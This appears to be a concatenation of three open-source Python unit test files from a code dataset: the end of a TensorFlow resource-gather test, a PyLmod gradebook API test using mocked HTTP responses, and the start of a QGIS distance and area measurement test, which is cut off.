params=[[[100, 101], [110, 111]], [[200, 201], [210, 211]]],
indices=[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
expected=[[[100, 101], [111, 110]], [[200, 200], [211, 211]]]),
# 0 < batch_dims < indices.shape.ndims - 1
dict( # 3D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[[3, 1], [2, 0]], [[0, 3], [2, 2]]],
expected=[[[13, 11], [12, 10]], [[20, 23], [22, 22]]]),
dict( # 4D indices (1 batch dim)
batch_dims=1,
params=[[6, 7], [8, 9]],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[6, 7], [7, 6]], [[6, 6], [7, 7]]],
[[[9, 9], [8, 8]], [[8, 9], [9, 8]]]]),
dict( # 4D indices (2 batch dims)
batch_dims=2,
params=[[[2, 3], [4, 5]], [[6, 7], [8, 9]]],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[2, 3], [3, 2]], [[4, 4], [5, 5]]],
[[[7, 7], [6, 6]], [[8, 9], [9, 8]]]]),
])
@test_util.run_in_graph_and_eager_modes
def testGatherWithBatchDims(self, params, indices, batch_dims, expected):
var = resource_variable_ops.ResourceVariable(params, name="var0")
with ops.control_dependencies([var.initializer]):
result = resource_variable_ops.resource_gather(
var.handle, indices, dtype=var.dtype, batch_dims=batch_dims)
self.assertAllEqual(expected, result)
@parameterized.parameters([
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=0,
output_shape=[2, 3, 8, 9, 10, 3, 4, 5, 6, 7]
# = indices.shape + params.shape[1:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=1,
output_shape=[2, 3, 8, 9, 10, 4, 5, 6, 7]
# = params.shape[:1] + indices.shape[1:] + params.shape[2:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=2,
output_shape=[2, 3, 8, 9, 10, 5, 6, 7]
# = params.shape[:2] + indices.shape[2:] + params.shape[3:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 4, 9, 10],
batch_dims=3,
output_shape=[2, 3, 4, 9, 10, 6, 7]
# = params.shape[:3] + indices.shape[3:] + params.shape[4:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 4, 5, 10],
batch_dims=4,
output_shape=[2, 3, 4, 5, 10, 7]
# = params.shape[:4] + indices.shape[4:] + params.shape[5:]
),
])
@test_util.run_in_graph_and_eager_modes
def testGatherWithBatchDimsMatchesTensor(self, params_shape, indices_shape,
batch_dims, output_shape):
"""Checks that gather with batch_dims returns the correct shape."""
# Generate a `params` tensor with the indicated shape.
params_size = np.prod(params_shape)
params = np.reshape(np.arange(params_size, dtype=np.int32), params_shape)
# Generate an `indices` tensor with the indicated shape, where each index
# is within the appropriate range.
indices_size = np.prod(indices_shape)
indices = np.reshape(np.arange(indices_size, dtype=np.int32), indices_shape)
indices = indices % params_shape[batch_dims]
var = resource_variable_ops.ResourceVariable(params, name="var0")
with ops.control_dependencies([var.initializer]):
expected = array_ops.gather(
var.read_value(), indices, batch_dims=batch_dims)
result = resource_variable_ops.resource_gather(
var.handle, indices, dtype=var.dtype, batch_dims=batch_dims)
self.assertAllEqual(output_shape, result.shape.as_list())
self.assertAllEqual(expected, result)
@parameterized.parameters([
dict(dtype=dtypes.bool),
dict(dtype=dtypes.int64),
dict(dtype=dtypes.half),
dict(dtype=dtypes.float32),
dict(dtype=dtypes.double),
])
@test_util.run_gpu_only
@test_util.run_in_graph_and_eager_modes
def testGatherWithDTypes(self, dtype):
if dtype == dtypes.bool:
params = constant_op.constant([False, True, False, True])
expected = constant_op.constant([[False, True], [False, True]])
else:
params = constant_op.constant([6, 7, 8, 9], dtype=dtype)
expected = constant_op.constant([[8, 7], [6, 9]], dtype=dtype)
indices = constant_op.constant([[2, 1], [0, 3]])
var = resource_variable_ops.ResourceVariable(params, name="var0")
with ops.control_dependencies([var.initializer]):
result = resource_variable_ops.resource_gather(
var.handle, indices, dtype=dtype)
self.assertAllEqual(expected, result)
class PerReplicaResourceHandleTest(test_util.TensorFlowTestCase):
def setUp(self):
super(PerReplicaResourceHandleTest, self).setUp()
cpus = config.list_physical_devices("CPU")
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration(),
])
def testAllowedDevices(self):
device0 = "/job:localhost/replica:0/task:0/device:CPU:0"
device1 = "/job:localhost/replica:0/task:0/device:CPU:1"
value0 = 1
value1 = 2
with context.eager_mode():
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[], allowed_devices=[device0, device1])
with ops.device(device0):
assign0 = resource_variable_ops.assign_variable_op(handle, value0)
with ops.device(device1):
assign1 = resource_variable_ops.assign_variable_op(handle, value1)
with ops.control_dependencies([assign0, assign1]):
with ops.device(device0):
read0 = resource_variable_ops.read_variable_op(
handle, dtype=dtypes.int32)
with ops.device(device1):
read1 = resource_variable_ops.read_variable_op(
handle, dtype=dtypes.int32)
self.assertAllEqual(value0, read0)
self.assertAllEqual(value1, read1)
if __name__ == "__main__":
test.main()
| apache-2.0 | 8,965,684,115,641,290,000 | 41.245478 | 91 | 0.643434 | false |
amir-qayyum-khan/PyLmod | pylmod/tests/test_gradebook.py | 1 | 29583 | """
Verify gradebook API calls with unit tests
"""
import json
import tempfile
import time
import httpretty
import mock
from pylmod import GradeBook
from pylmod.exceptions import (
PyLmodUnexpectedData,
PyLmodNoSuchSection,
PyLmodFailedAssignmentCreation,
)
from pylmod.tests.common import BaseTest
class TestGradebook(BaseTest):
"""Validate defined gradebook methods in GradeBook class
"""
# Unit tests generally should do protected-accesses
# pylint: disable=protected-access
GRADEBOOK_ID = 1234
ASSIGNMENT_BODY = {
u'data':
[
{
u'assignmentId': 1,
u'categoryId': 1293820,
u'description': u'',
u'dueDate': 1372392000000,
u'dueDateString': u'06-28-2013',
u'gradebookId': 1293808,
u'graderVisible': True,
u'gradingSchemeId': 2431243,
u'gradingSchemeType': u'NUMERIC',
u'isComposite': False,
u'isHomework': False,
u'maxPointsTotal': 10.0,
u'name': u'Homework 1',
u'shortName': u'HW1',
u'userDeleted': False,
u'weight': 1.0
},
{
u'assignmentId': 2,
u'categoryId': 1293820,
u'description': u'',
u'dueDate': 1383541200000,
u'dueDateString': u'11-04-2013',
u'gradebookId': 1293808,
u'graderVisible': False,
u'gradingSchemeId': 16708851,
u'gradingSchemeType': u'NUMERIC',
u'isComposite': False,
u'isHomework': False,
u'maxPointsTotal': 100.0,
u'name': u'midterm1',
u'shortName': u'mid1',
u'userDeleted': False,
u'weight': 1.0
}
]
}
SECTION_BODY = {
'data':
{
'recitation': [
{
"name": "Unassigned",
"editable": False,
"members": None,
"shortName": "def",
"staffs": None,
"groupId": 1293925
},
{
"name": "Section 1",
"editable": False,
"members": None,
"shortName": "def",
"staffs": None,
"groupId": 123456
},
]
}
}
STUDENT_BODY = {
'data':
[
{
'accountEmail': '[email protected]',
'displayName': 'Alice',
'section': 'Unassigned',
'sectionId': 1293925,
'studentId': 1,
},
{
'accountEmail': '[email protected]',
'displayName': 'Bob',
'section': 'Section 1',
'sectionId': 123456,
'studentId': 2,
},
]
}
STAFF_BODY = {
u'data':
{
u'COURSE_ADMIN':
[
{
u'accountEmail': u'[email protected]',
u'displayName': u'Louie Duck',
},
],
u'COURSE_TA':
[
{
u'accountEmail': u'[email protected]',
u'displayName': u'Benjamin Franklin',
}
]
},
}
SIMPLE_STAFF_BODY = [
{
u'accountEmail': u'[email protected]',
u'displayName': u'Louie Duck',
u'role': 'COURSE_ADMIN',
},
{
u'accountEmail': u'[email protected]',
u'displayName': u'Benjamin Franklin',
u'role': 'COURSE_TA',
}
]
@staticmethod
def _get_grades():
"""Return a dictionary list of grades.
Since it has a dynamic time value these need to be generated
with a function as close to the response time as possible.
"""
return [
{
'studentId': 1,
'assignmentId': 1,
'mode': 2,
'comment': 'from MITx {0}'.format(time.ctime(time.time())),
'numericGradeValue': '1.1',
'isGradeApproved': False
},
{
'studentId': 2,
'assignmentId': 1,
'mode': 2,
'comment': 'from MITx {0}'.format(time.ctime(time.time())),
'numericGradeValue': '5.1',
'isGradeApproved': False
},
]
def _get_multigrade(self, approve_grades=False):
"""Get a list of spreadsheet rows as dictionaries
Get a list of spreadsheet row values to test submitting
grades in a spreadsheet to the LMod web service.
Args:
approve_grades (boolean): list of spreadsheet rows as
dictionaries
Returns: list - list of spreadsheet rows
"""
return [
{'assignmentId': 1,
'isGradeApproved': approve_grades,
'mode': 2,
'numericGradeValue': 2.2,
'studentId': 1},
{'assignmentId': 1,
'isGradeApproved': approve_grades,
'mode': 2,
'numericGradeValue': 1.1,
'studentId': None},
]
def _register_get_gradebook(self, send_data=True):
"""Register gradebook endpoint for API."""
body = {
u"message": u"",
u"status": 0,
u"data":
{
u"gradebookId": self.GRADEBOOK_ID,
u"uuid": self.GBUUID,
u"courseName": u"Test",
u"courseNumber": u"testingstuff",
u"membershipSource": u"stellar",
u"gradebookName": u"Gradebook for testingstuff"
}
}
if not send_data:
del body['data']
httpretty.register_uri(
httpretty.GET,
'{0}gradebook'.format(self.GRADEBOOK_REGISTER_BASE),
body=json.dumps(body)
)
def _register_get_options(self, send_data=True):
"""Handle get_options API call"""
if send_data:
body = json.dumps(
{'data': {'membershipQualifier': '/project/mitxdemosite'}}
)
else:
body = json.dumps({u'data': {u'nada': 'nothing'}})
httpretty.register_uri(
httpretty.GET,
'{0}gradebook/options/{1}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID
),
body=body
)
def _register_get_assignments(self):
"""Respond to assignment list requests"""
httpretty.register_uri(
httpretty.GET,
'{0}assignments/{1}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID
),
body=json.dumps(self.ASSIGNMENT_BODY)
)
def _register_create_assignment(self, body=''):
"""Handle assignment creation as needed"""
httpretty.register_uri(
httpretty.POST,
'{0}assignment'.format(self.GRADEBOOK_REGISTER_BASE),
body=json.dumps(body)
)
def _register_multi_grade(self, body=''):
"""Handle multigrade API call"""
httpretty.register_uri(
httpretty.POST,
'{0}multiGrades/{1}'.format(
self.GRADEBOOK_REGISTER_BASE, self.GRADEBOOK_ID
),
body=json.dumps(body)
)
def _register_get_sections(self):
"""Handle section getting API call"""
httpretty.register_uri(
httpretty.GET,
'{0}sections/{1}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID
),
body=json.dumps(self.SECTION_BODY)
)
def _register_get_students(self):
"""Handle student getting API call"""
httpretty.register_uri(
httpretty.GET,
'{0}students/{1}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID
),
body=json.dumps(self.STUDENT_BODY)
)
def _register_get_students_in_section(self):
"""Handle student getting API call"""
section = self.SECTION_BODY['data']['recitation'][0]['groupId']
students = [x for x in self.STUDENT_BODY['data']
if x['sectionId'] == section]
students_data = dict(data=students)
httpretty.register_uri(
httpretty.GET,
'{0}students/{1}/section/{2}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID,
section,
),
body=json.dumps(students_data)
)
def test_constructor(self):
"""Verify constructor does as expected without gbuuid (no remote API
call).
"""
# Strip off base URL to make sure it comes back
urlbase = self.URLBASE[:-1]
test_base = GradeBook(self.CERT, urlbase)
self.assertEqual(
test_base.urlbase,
self.URLBASE + 'service/gradebook/'
)
self.assertEqual(test_base._session.cert, self.CERT)
self.assertIsNone(test_base.gradebookid)
@httpretty.activate
def test_constructor_with_gbuuid(self):
"""Verify we can construct with GBUUID and properly add
self.gradebook_id
"""
self._register_get_gradebook()
test_base = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
self.assertEqual(test_base.gradebook_id, self.GRADEBOOK_ID)
# Also verify we made an API call
last_request = httpretty.last_request()
self.assertEqual(last_request.querystring, dict(uuid=[self.GBUUID]))
@httpretty.activate
def test_get_gradebook_id(self):
"""Verify get_gradebook_id works and sets the property as expected."""
self._register_get_gradebook()
test_gradebook = GradeBook(self.CERT, self.URLBASE)
gradebook_id = test_gradebook.get_gradebook_id(self.GBUUID)
self.assertEqual(gradebook_id, self.GRADEBOOK_ID)
last_request = httpretty.last_request()
self.assertEqual(last_request.querystring, dict(uuid=[self.GBUUID]))
# Remove data and assert exception raised
self._register_get_gradebook(False)
with self.assertRaises(PyLmodUnexpectedData):
test_gradebook.get_gradebook_id(self.GBUUID)
@httpretty.activate
def test_get_options(self):
"""Verify that we can get the options for a gradebook."""
self._register_get_options(True)
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
options = gradebook.get_options(gradebook_id=self.GRADEBOOK_ID)
self.assertIn('membershipQualifier', options)
# check for no data
self._register_get_options(False)
options = gradebook.get_options(gradebook_id=self.GRADEBOOK_ID)
self.assertNotIn('membershipQualifier', options)
@httpretty.activate
def test_get_assignments(self):
"""Verify we can get assignments as requested"""
self._register_get_gradebook()
self._register_get_assignments()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
assignments = gradebook.get_assignments()
self.assertEqual(assignments, self.ASSIGNMENT_BODY['data'])
last_request = httpretty.last_request()
self.assertEqual(
last_request.querystring,
dict(
includeMaxPoints=['true'],
includeAvgStats=['false'],
includeGradingStats=['false']
)
)
# Check simple style
assignments = gradebook.get_assignments(simple=True)
self.assertEqual(
assignments,
[{'AssignmentName': x['name']}
for x in self.ASSIGNMENT_BODY['data']]
)
# Verify parameter handling
assignments = gradebook.get_assignments(
max_points=False, avg_stats=True, grading_stats=True
)
last_request = httpretty.last_request()
self.assertEqual(
last_request.querystring,
dict(
includeMaxPoints=['false'],
includeAvgStats=['true'],
includeGradingStats=['true']
)
)
@httpretty.activate
def test_get_assignment_by_name(self):
"""Verify grabbing an assignment by name."""
self._register_get_gradebook()
# Verify just with a list (no API)
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
static_assignments = [dict(name='blah', assignmentId=1)]
# No match
self.assertEqual(
(None, None),
gradebook.get_assignment_by_name('stuff', static_assignments)
)
# Match
self.assertEqual(
(1, static_assignments[0]),
gradebook.get_assignment_by_name(
'blah', static_assignments
)
)
# Verify we can get assignments via API and match
self._register_get_assignments()
assignment = self.ASSIGNMENT_BODY['data'][0]
self.assertEqual(
(assignment['assignmentId'], assignment),
gradebook.get_assignment_by_name(assignment['name'])
)
@httpretty.activate
def test_create_assignment(self):
"""Verify creating a new assignment."""
response_data = {'message': 'success'}
self._register_create_assignment(response_data)
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
response = gradebook.create_assignment(
'Test Assign', 'test-assign', 1.0, 100.0, '11-04-2999'
)
self.assertEqual(response_data, response)
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps({
'name': 'Test Assign',
'shortName': 'test-assign',
'weight': 1.0,
'graderVisible': False,
'gradingSchemeType': 'NUMERIC',
'gradebookId': self.GRADEBOOK_ID,
'maxPointsTotal': 100.0,
'dueDateString': '11-04-2999',
})
)
@httpretty.activate
def test_delete_assignment(self):
"""Verify deleting a new assignment."""
response_data = {'message': 'success'}
httpretty.register_uri(
httpretty.DELETE,
'{0}assignment/1'.format(self.GRADEBOOK_REGISTER_BASE),
body=json.dumps(response_data)
)
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
response = gradebook.delete_assignment(1)
self.assertEqual(response_data, response)
@httpretty.activate
def test_set_grade(self):
"""Verify the setting of grades is as we expect.
"""
response_data = {'message': 'success'}
httpretty.register_uri(
httpretty.POST,
'{0}grades/{1}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID
),
body=json.dumps(response_data)
)
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
grade = self._get_grades()[0]
response = gradebook.set_grade(
assignment_id=grade['assignmentId'],
student_id=grade['studentId'],
grade_value=grade['numericGradeValue'],
isGradeApproved=False
)
self.assertEqual(response_data, response)
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(grade)
)
@httpretty.activate
def test_multi_grade(self):
"""Verify that we can set multiple grades at once
"""
response_data = {'message': 'success'}
self._register_multi_grade(response_data)
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
grades = self._get_grades()
response = gradebook.multi_grade(grades)
self.assertEqual(response_data, response)
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(grades)
)
@httpretty.activate
def test_get_sections(self):
"""Verify we can get sections for a course."""
self._register_get_gradebook()
self._register_get_sections()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
sections = gradebook.get_sections()
self.assertEqual(sections, self.SECTION_BODY['data'])
# Check simple style
sections = gradebook.get_sections(simple=True)
expected_sections = gradebook.unravel_sections(
self.SECTION_BODY['data']
)
self.assertEqual(
sections,
[{'SectionName': x['name']}
for x in expected_sections],
)
@httpretty.activate
def test_get_staff(self):
"""Verify staff list is returned."""
httpretty.register_uri(
httpretty.GET,
'{0}staff/{1}'.format(
self.GRADEBOOK_REGISTER_BASE,
self.GRADEBOOK_ID
),
body=json.dumps(self.STAFF_BODY)
)
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
staff = gradebook.get_staff(self.GRADEBOOK_ID)
self.assertEqual(staff, self.STAFF_BODY['data'])
# Check simple style
staff = gradebook.get_staff(self.GRADEBOOK_ID, simple=True)
expected_staff = gradebook.unravel_staff(self.STAFF_BODY)
simple_list = []
for member in expected_staff.__iter__():
simple_list.append({
'accountEmail': member['accountEmail'],
'displayName': member['displayName'],
'role': member['role'],
})
for member in staff:
self.assertIn(member, simple_list)
@httpretty.activate
def test_get_section_by_name(self):
"""Verify grabbing a section by name."""
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
# With match
self._register_get_sections()
section_type = 'recitation'
section = self.SECTION_BODY['data'][section_type][0]
# Add the type modifier we now add to the structure
section['sectionType'] = section_type
self.assertEqual(
(section['groupId'], section),
gradebook.get_section_by_name(section['name'])
)
# Without match
self._register_get_sections()
section = 'Nope'
self.assertEqual(
(None, None),
gradebook.get_section_by_name(section)
)
@httpretty.activate
def test_get_students(self):
"""Verify being able to get students for section/gradebook."""
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
self._register_get_students()
# Without section specified
students = gradebook.get_students()
self.assertEqual(students, self.STUDENT_BODY['data'])
# Simple data return (and upcasing mit.edu)
students = gradebook.get_students(simple=True)
mapped_data = []
for student in self.STUDENT_BODY['data']:
email = student['accountEmail']
if 'mit.edu' in email:
email = email.replace('mit.edu', 'MIT.EDU')
mapped_data.append(dict(
email=email,
name=student['displayName'],
section=student['section'],
))
self.assertEqual(mapped_data, students)
# With valid section specified
self._register_get_sections()
self._register_get_students_in_section()
section_name = self.SECTION_BODY['data']['recitation'][0]['name']
students = gradebook.get_students(
section_name=section_name
)
self.assertEqual(
students,
[x for x in self.STUDENT_BODY['data']
if x['section'] == section_name]
)
# With invalid section
with self.assertRaises(PyLmodNoSuchSection):
students = gradebook.get_students(section_name='nope')
@httpretty.activate
def test_get_students_by_email(self):
"""Verify being able to get students by e-mail"""
self._register_get_gradebook()
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
self._register_get_students()
real_student = self.STUDENT_BODY['data'][0]
# Match against passed in list
self.assertEqual(
gradebook.get_student_by_email(
real_student['accountEmail'],
students=self.STUDENT_BODY['data']
),
(real_student['studentId'], real_student)
)
# Get legitimate email
student = gradebook.get_student_by_email(
real_student['accountEmail']
)
self.assertEqual(student, (real_student['studentId'], real_student))
# And with non-existent student
self.assertEqual(
(None, None),
gradebook.get_student_by_email('cheese')
)
@httpretty.activate
def test_spreadsheet2gradebook_multi(self):
"""Verify that we can use a spreadsheet to set grades
"""
response_data = {'message': 'success'}
self._register_get_gradebook()
self._register_get_assignments()
self._register_get_students()
self._register_multi_grade(response_data)
gradebook = GradeBook(self.CERT, self.URLBASE, self.GBUUID)
# Create "spreadsheet" that doesn't require creating assignments.
spreadsheet = [
{'External email': '[email protected]', 'Homework 1': 2.2},
{'External email': 'cheese', 'Homework 1': 1.1},
]
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=False,
)
# Verify that we got the grades we expect
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(self._get_multigrade(approve_grades=False))
)
# Verify that we got the same grades, setting auto-approve = False
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=False
)
# Verify that we got the grades we expect
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(self._get_multigrade(approve_grades=False))
)
# Verify that we got the same grades, setting auto-approve = False
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=False
)
# Verify that we got the grades we expect
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(self._get_multigrade(approve_grades=False))
)
# Verify that we got the same grades, setting auto-approve = True
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=True
)
# Verify that we got the grades we expect
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(self._get_multigrade(approve_grades=True))
)
# Verify that we got the same grades, setting auto-approve = True
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=True
)
# Verify that we got the grades we expect
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps(self._get_multigrade(approve_grades=True))
)
# Now run it when the assignment doesn't exist to exercise
# assignment creation code.
# Setup create to return an assignment ID as expected by the API
assignment_id = 3
self._register_create_assignment(
dict(data=dict(assignmentId=assignment_id))
)
spreadsheet = [
{'External email': '[email protected]', 'Homework 8': 2.2},
]
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email']
)
last_request = httpretty.last_request()
expected_response = self._get_multigrade(approve_grades=False)[0]
expected_response['assignmentId'] = assignment_id
self.assertEqual(
last_request.body,
json.dumps([expected_response])
)
# Now with assignment failing to be created
self._register_create_assignment({})
with self.assertRaises(PyLmodFailedAssignmentCreation):
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=False,
)
# And finally with a bad grade
spreadsheet = [
{'External email': '[email protected]', 'Homework 1': 'foo'},
{'External email': '[email protected]', 'midterm1': 1.1},
]
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=False
)
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps([
{u'assignmentId': 2,
u'isGradeApproved': False,
u'mode': 2,
u'numericGradeValue': 1.1,
u'studentId': 1},
])
)
@mock.patch.object(GradeBook, '_spreadsheet2gradebook_multi')
@mock.patch('csv.DictReader')
def test_spreadshee2gradebook(self, csv_patch, multi_patch):
"""Do a simple test of the spreadsheet to gradebook public method"""
non_assignment_fields = [
'ID', 'Username', 'Full Name', 'edX email', 'External email'
]
email_field = 'External email'
gradebook = GradeBook(self.CERT, self.URLBASE)
# Test with tmp file handle
with tempfile.NamedTemporaryFile(delete=True) as temp_file:
gradebook.spreadsheet2gradebook(temp_file.name)
called_with = multi_patch.call_args
csv_patch.assert_called_once()
self.assertEqual(called_with[0][1], email_field)
self.assertEqual(called_with[0][2], non_assignment_fields)
# Test with tmp file handle, approve_grades=False
with tempfile.NamedTemporaryFile(delete=True) as temp_file:
gradebook.spreadsheet2gradebook(temp_file.name,
approve_grades=False)
called_with = multi_patch.call_args
csv_patch.assert_called_once()
self.assertEqual(called_with[0][1], email_field)
self.assertEqual(called_with[0][2], non_assignment_fields)
# Test with tmp file handle, approve_grades=True
with tempfile.NamedTemporaryFile(delete=True) as temp_file:
gradebook.spreadsheet2gradebook(temp_file.name,
approve_grades=True)
called_with = multi_patch.call_args
csv_patch.assert_called_once()
self.assertEqual(called_with[0][1], email_field)
self.assertEqual(called_with[0][2], non_assignment_fields)
# Test with patched csvReader and named e-mail field
alternate_email_field = 'stuff'
gradebook.spreadsheet2gradebook(csv_patch, alternate_email_field)
non_assignment_fields.append(alternate_email_field)
called_with = multi_patch.call_args
csv_patch.assert_called_once()
self.assertEqual(called_with[0][1], alternate_email_field)
self.assertEqual(called_with[0][2], non_assignment_fields)
| bsd-2-clause | -3,731,292,784,134,643,000 | 33.721831 | 78 | 0.54893 | false |
SebDieBln/QGIS | tests/src/python/test_qgsdistancearea.py | 1 | 14468 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsDistanceArea.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Jürgen E. Fischer'
__date__ = '19/01/2014'
__copyright__ = 'Copyright 2014, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis
from qgis.core import (QgsGeometry,
QgsPoint,
QgsDistanceArea,
QgsCoordinateReferenceSystem,
QGis,
QgsUnitTypes
)
from qgis.testing import (start_app,
unittest)
from PyQt4.QtCore import QLocale
# Convenience instances in case you may need them
# not used in this test
start_app()
class TestQgsDistanceArea(unittest.TestCase):
def testCrs(self):
# test setting/getting the source CRS
da = QgsDistanceArea()
# try setting using a crs id
da.setSourceCrs(3452)
self.assertEqual(da.sourceCrsId(), 3452)
# try setting using a CRS object
crs = QgsCoordinateReferenceSystem(3111, QgsCoordinateReferenceSystem.EpsgCrsId)
da.setSourceCrs(crs)
self.assertEqual(da.sourceCrsId(), crs.srsid())
def testMeasureLine(self):
# +-+
# | |
# +-+ +
linestring = QgsGeometry.fromPolyline(
[QgsPoint(0, 0), QgsPoint(1, 0), QgsPoint(1, 1), QgsPoint(2, 1), QgsPoint(2, 0), ]
)
da = QgsDistanceArea()
length = da.measure(linestring)
myMessage = ('Expected:\n%f\nGot:\n%f\n' %
(4, length))
assert length == 4, myMessage
def testMeasureMultiLine(self):
# +-+ +-+-+
# | | | |
# +-+ + + +-+
linestring = QgsGeometry.fromMultiPolyline(
[
[QgsPoint(0, 0), QgsPoint(1, 0), QgsPoint(1, 1), QgsPoint(2, 1), QgsPoint(2, 0), ],
[QgsPoint(3, 0), QgsPoint(3, 1), QgsPoint(5, 1), QgsPoint(5, 0), QgsPoint(6, 0), ]
]
)
da = QgsDistanceArea()
length = da.measure(linestring)
myMessage = ('Expected:\n%f\nGot:\n%f\n' %
(9, length))
assert length == 9, myMessage
def testMeasurePolygon(self):
# +-+-+
# | |
# + +-+
# | |
# +-+
polygon = QgsGeometry.fromPolygon(
[[
QgsPoint(0, 0), QgsPoint(1, 0), QgsPoint(1, 1), QgsPoint(2, 1), QgsPoint(2, 2), QgsPoint(0, 2), QgsPoint(0, 0),
]]
)
da = QgsDistanceArea()
area = da.measure(polygon)
assert area == 3, 'Expected:\n%f\nGot:\n%f\n' % (3, area)
perimeter = da.measurePerimeter(polygon)
assert perimeter == 8, 'Expected:\n%f\nGot:\n%f\n' % (8, perimeter)
def testMeasurePolygonWithHole(self):
# +-+-+-+
# | |
# + +-+ +
# | | | |
# + +-+ +
# | |
# +-+-+-+
polygon = QgsGeometry.fromPolygon(
[
[QgsPoint(0, 0), QgsPoint(3, 0), QgsPoint(3, 3), QgsPoint(0, 3), QgsPoint(0, 0)],
[QgsPoint(1, 1), QgsPoint(2, 1), QgsPoint(2, 2), QgsPoint(1, 2), QgsPoint(1, 1)],
]
)
da = QgsDistanceArea()
area = da.measure(polygon)
assert area == 8, "Expected:\n%f\nGot:\n%f\n" % (8, area)
# MH150729: Changed behaviour to consider inner rings for perimeter calculation. Therefore, expected result is 16.
perimeter = da.measurePerimeter(polygon)
assert perimeter == 16, "Expected:\n%f\nGot:\n%f\n" % (16, perimeter)
def testMeasureMultiPolygon(self):
# +-+-+ +-+-+
# | | | |
# + +-+ +-+ +
# | | | |
# +-+ +-+
polygon = QgsGeometry.fromMultiPolygon(
[
[[QgsPoint(0, 0), QgsPoint(1, 0), QgsPoint(1, 1), QgsPoint(2, 1), QgsPoint(2, 2), QgsPoint(0, 2), QgsPoint(0, 0), ]],
[[QgsPoint(4, 0), QgsPoint(5, 0), QgsPoint(5, 2), QgsPoint(3, 2), QgsPoint(3, 1), QgsPoint(4, 1), QgsPoint(4, 0), ]]
]
)
da = QgsDistanceArea()
area = da.measure(polygon)
assert area == 6, 'Expected:\n%f\nGot:\n%f\n' % (6, area)
perimeter = da.measurePerimeter(polygon)
assert perimeter == 16, "Expected:\n%f\nGot:\n%f\n" % (16, perimeter)
def testWillUseEllipsoid(self):
"""test QgsDistanceArea::willUseEllipsoid """
da = QgsDistanceArea()
da.setEllipsoidalMode(False)
da.setEllipsoid("NONE")
self.assertFalse(da.willUseEllipsoid())
da.setEllipsoidalMode(True)
self.assertFalse(da.willUseEllipsoid())
da.setEllipsoid("WGS84")
assert da.willUseEllipsoid()
da.setEllipsoidalMode(False)
